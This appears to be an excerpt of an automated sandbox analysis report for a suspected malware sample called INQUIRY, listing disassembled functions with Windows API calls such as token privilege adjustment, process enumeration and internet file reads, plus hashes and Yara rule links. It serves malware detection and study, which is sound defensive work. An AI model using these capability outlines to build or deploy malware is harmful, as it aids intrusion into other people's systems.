                                                                                              • Instruction ID: 36912b23429e82be27180aebb4e3a561428be766b2d6796db92f18451a5b3337
                                                                                              • Opcode Fuzzy Hash: 979a64eaf9692d02a6e1fc3388ccc36bf1ba5133ee31150a3869f5eb727dd913
                                                                                              • Instruction Fuzzy Hash: 19D01274B14713DFDB20DF75E858B4676E4AF05351B25CC3A9485D6150DA70D4C0C654
                                                                                              Function 00A23030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 674341424-0
                                                                                              • Opcode ID: 390f8d0cb7066ab1cc95d1d11968bbbc9112019acb2c8abc21fbe0248120fb5e
                                                                                              • Instruction ID: d3d2dca6d90a4ae9e62366634c0c757cef771713f9b2cf64a78b99544045833c
                                                                                              • Opcode Fuzzy Hash: 390f8d0cb7066ab1cc95d1d11968bbbc9112019acb2c8abc21fbe0248120fb5e
                                                                                              • Instruction Fuzzy Hash: B1229D726083109FCB24DF18D991BABB7F4BF85310F50492DF89697291DB34E948CB92
                                                                                              Function 00A8EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00A8EE3D
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00A8EE4B
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00A8EF0B
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00A8EF1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2576544623-0
                                                                                              • Opcode ID: 8425398ed9d8be734d391e186a2e7e0d05dcede01081ccbfecdfbf89183598f5
                                                                                              • Instruction ID: 613079677e60e9c50e139a0489c321523d584749c94733985b61dee3682f8070
                                                                                              • Opcode Fuzzy Hash: 8425398ed9d8be734d391e186a2e7e0d05dcede01081ccbfecdfbf89183598f5
                                                                                              • Instruction Fuzzy Hash: 5651AC71508311AFD310EF24DC85EABB7E8EF98750F10482DF995972A1EB30E949CB92
                                                                                              Function 00A1FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID:
                                                                                              • API String ID: 3964851224-0
                                                                                              • Opcode ID: c2f68756813e939ddd438f98716ce88168c5735b318f97c0702d70792ca9e28c
                                                                                              • Instruction ID: a389f2b91debd65d8a910e926f25dcd90648340dc5a3ff116cc1febf81b237c9
                                                                                              • Opcode Fuzzy Hash: c2f68756813e939ddd438f98716ce88168c5735b318f97c0702d70792ca9e28c
                                                                                              • Instruction Fuzzy Hash: 2D926B706083518FD720DF18D580B6ABBF5BF89304F14896DE89A8B362D775EC85CB92
                                                                                              Function 00A6E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A6E628
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen
                                                                                              • String ID: ($|
                                                                                              • API String ID: 1659193697-1631851259
                                                                                              • Opcode ID: ba2cfea7f5eab1d1f4d55052558bb8ab010682a4f3cc813a533304e2a14104c1
                                                                                              • Instruction ID: 73e61e6bd149563d78884f8813cdce023d2e0ca6839f3240e40bd71b1704c925
                                                                                              • Opcode Fuzzy Hash: ba2cfea7f5eab1d1f4d55052558bb8ab010682a4f3cc813a533304e2a14104c1
                                                                                              • Instruction Fuzzy Hash: 7D322579A007059FDB28CF59C481A6AB7F1FF48320B15C56EE89ADB3A1E770E941CB44
                                                                                              Function 00A822EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A8180A,00000000), ref: 00A823E1
                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A82418
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 599397726-0
                                                                                              • Opcode ID: 5cb5d9eef4e1f244f7c57ea39727e404d33a1a911a307aa35de76fed55852276
                                                                                              • Instruction ID: 13366d1057c72cc04382b03afa4b53f37aa912f8f1d4eaba3a3bed64e54d0646
                                                                                              • Opcode Fuzzy Hash: 5cb5d9eef4e1f244f7c57ea39727e404d33a1a911a307aa35de76fed55852276
                                                                                              • Instruction Fuzzy Hash: 6B41E471A04209BFEB20EF95DD85FBBB7BCEB40324F10406AFA41AA140EB759E419760
                                                                                              Function 00A7B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A7B40B
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A7B465
                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A7B4B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID:
                                                                                              • API String ID: 1682464887-0
                                                                                              • Opcode ID: e0ba4ac6178b8fc45fbd3504f1f415e4fc57d2aa72e7862386e3df415805a1ec
                                                                                              • Instruction ID: 3a0e34c17bcc957af65aa4b68cbe7bfe0f4131d583b53289cb20a5ae933221a0
                                                                                              • Opcode Fuzzy Hash: e0ba4ac6178b8fc45fbd3504f1f415e4fc57d2aa72e7862386e3df415805a1ec
                                                                                              • Instruction Fuzzy Hash: 59216075A00108EFCB00EFA5DC84AEEBBB8FF49310F1480AAE905EB351CB319956CB55
                                                                                              Function 00A687E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
                                                                                                • Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
                                                                                              • GetLastError.KERNEL32 ref: 00A68865
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1922334811-0
                                                                                              • Opcode ID: 3cf0b9f5a553dd50e2138cc860990bb0aaa41bddcb37eea7df03be19e9d85b45
                                                                                              • Instruction ID: 97f124b4bd111d1e17633f764ee10420ad70497850cbc2c4c9882b9096e93a32
                                                                                              • Opcode Fuzzy Hash: 3cf0b9f5a553dd50e2138cc860990bb0aaa41bddcb37eea7df03be19e9d85b45
                                                                                              • Instruction Fuzzy Hash: BB118FB2514205AFE718DFA4DC85D6BB7FCEB44750B20862EF49597241EF74BC418B60
                                                                                              Function 00A6874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A68774
                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A6878B
                                                                                              • FreeSid.ADVAPI32(?), ref: 00A6879B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                              • String ID:
                                                                                              • API String ID: 3429775523-0
                                                                                              • Opcode ID: d76b372590c5d84e277dcdc03079c18c817d87240f6e8a6a3e3d5a43ac5e09b7
                                                                                              • Instruction ID: ed99ef34052aadaf83aa1d50a984b20dbb4a984e7def752f89e8f457d43baf8c
                                                                                              • Opcode Fuzzy Hash: d76b372590c5d84e277dcdc03079c18c817d87240f6e8a6a3e3d5a43ac5e09b7
                                                                                              • Instruction Fuzzy Hash: 2EF06D75A1130CBFDF00DFF4DC89ABEBBBCEF08201F1045A9A901E2181EB756A048B50
                                                                                              Function 00A7C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A7C6FB
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7C72B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 55b809feb1d1d2d0fc120f5fab62a227fcd0fb8081f88cde461fc8e6286efbcb
                                                                                              • Instruction ID: 47c60ef0c03d000cd0fe2350b8cc081aec0dfdc459cea86232120fa21c2b3b29
                                                                                              • Opcode Fuzzy Hash: 55b809feb1d1d2d0fc120f5fab62a227fcd0fb8081f88cde461fc8e6286efbcb
                                                                                              • Instruction Fuzzy Hash: DF118E726002009FDB10EF29D855A6AF7E8EF85320F00C51EF8A9C7290DB30A801CB81
                                                                                              Function 00A7A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A89468,?,00A9FB84,?), ref: 00A7A097
                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A89468,?,00A9FB84,?), ref: 00A7A0A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 84f9a0f396dbac198075b0893fdaa1d74b4528a6beb062e744297a958ea3cc46
                                                                                              • Instruction ID: 3d4d64e274f2d22f92cb1a64d48f3dca92591b560f457632d36e26486fc0841b
                                                                                              • Opcode Fuzzy Hash: 84f9a0f396dbac198075b0893fdaa1d74b4528a6beb062e744297a958ea3cc46
                                                                                              • Instruction Fuzzy Hash: 98F08C3520522DBBDB21AFA4DC48FEE776CBF08361F008266F919D6181DA309A40CBA1
                                                                                              Function 00A681CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A68309), ref: 00A681E0
                                                                                              • CloseHandle.KERNEL32(?,?,00A68309), ref: 00A681F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 81990902-0
                                                                                              • Opcode ID: ad3774b014476f79496e03555a69eb1fbd7a6f25ad702fe99a2d74c021593af7
                                                                                              • Instruction ID: f970feb3ceb1bdead4884df80d212242a1a99823465c94e4f41f9714ace24c06
                                                                                              • Opcode Fuzzy Hash: ad3774b014476f79496e03555a69eb1fbd7a6f25ad702fe99a2d74c021593af7
                                                                                              • Instruction Fuzzy Hash: A9E0B672111620AEE7256B60FC09D777BAEEB04310B24892AB8A6C4470DB62ACA1DB10
                                                                                              Function 00A3A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A38D57,?,?,?,00000001), ref: 00A3A15A
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A3A163
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 4801056496ff78d1bd9c9743009f6a702726632bdc8bf50f3835d6a033b61fc3
                                                                                              • Instruction ID: ab8689731373996d45ec006f53712cc1c9673e96709cd1110ec4914bc5373d68
                                                                                              • Opcode Fuzzy Hash: 4801056496ff78d1bd9c9743009f6a702726632bdc8bf50f3835d6a033b61fc3
                                                                                              • Instruction Fuzzy Hash: 3EB09231254208EFCA006BE1EC09B8A3F68EB44BA2F404022F61DC8060CF6654A28A91
                                                                                              Function 00A3F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d89e808c22395bcb86f83e5cfc1ca98fd24276cbda232747064cbf30cb294b5
                                                                                              • Instruction ID: 877e7ce4f2e37a33f22bcd8af37b0550ea25b5f8dee4964964df85494fb54690
                                                                                              • Opcode Fuzzy Hash: 5d89e808c22395bcb86f83e5cfc1ca98fd24276cbda232747064cbf30cb294b5
                                                                                              • Instruction Fuzzy Hash: C332F262D29F424DD7239634DC3233AA249AFB73D4F15D737F81AB59AAEB28C4834100
                                                                                              Function 00A4242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 03686f39721b26b6f0b062e09e5a56eccbf6309c4c32736d5a33cf878a4a0f15
                                                                                              • Instruction ID: ac48c29722aac79f58e7c9e49cb61f98b789deb002fa7bd9fa2931fe30ac3d8c
                                                                                              • Opcode Fuzzy Hash: 03686f39721b26b6f0b062e09e5a56eccbf6309c4c32736d5a33cf878a4a0f15
                                                                                              • Instruction Fuzzy Hash: 48B11320D2AF414DD76396398831336BB9CAFBB2C5F51D71BFC1674D62EB2185838241
                                                                                              Function 00A78889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __time64.LIBCMT ref: 00A7889B
                                                                                                • Part of subcall function 00A3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A78F6E,00000000,?,?,?,?,00A7911F,00000000,?), ref: 00A35213
                                                                                                • Part of subcall function 00A3520A: __aulldiv.LIBCMT ref: 00A35233
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                                              • String ID:
                                                                                              • API String ID: 2893107130-0
                                                                                              • Opcode ID: 10baac5489c30f6bfc6d65139e5c76c28b1a4b6334f2735a09138985df2ec8e6
                                                                                              • Instruction ID: 5a9ca9b235abaaf7b717e12c4e2761b9381fdc340d2872c878d9275b5a1e977c
                                                                                              • Opcode Fuzzy Hash: 10baac5489c30f6bfc6d65139e5c76c28b1a4b6334f2735a09138985df2ec8e6
                                                                                              • Instruction Fuzzy Hash: 1821A2326255108BC729CF69D841A52B3E1EBA5311B688E6DE0FACB2C0CA34A945CB54
                                                                                              Function 00A74C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00A74C4A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: mouse_event
                                                                                              • String ID:
                                                                                              • API String ID: 2434400541-0
                                                                                              • Opcode ID: 95b3df02212e5d8de6b9a2102770c80b5c9912880ac8dd25d621c074d3f1ecb4
                                                                                              • Instruction ID: deb4bd23261049868c3eb87955273dec5b236d06465be1150a2637b0c2a3a04a
                                                                                              • Opcode Fuzzy Hash: 95b3df02212e5d8de6b9a2102770c80b5c9912880ac8dd25d621c074d3f1ecb4
                                                                                              • Instruction Fuzzy Hash: E4D05EA116520978FC1D07649E1FF7B0508E348782FD0C1497109CA0C1EF905C405032
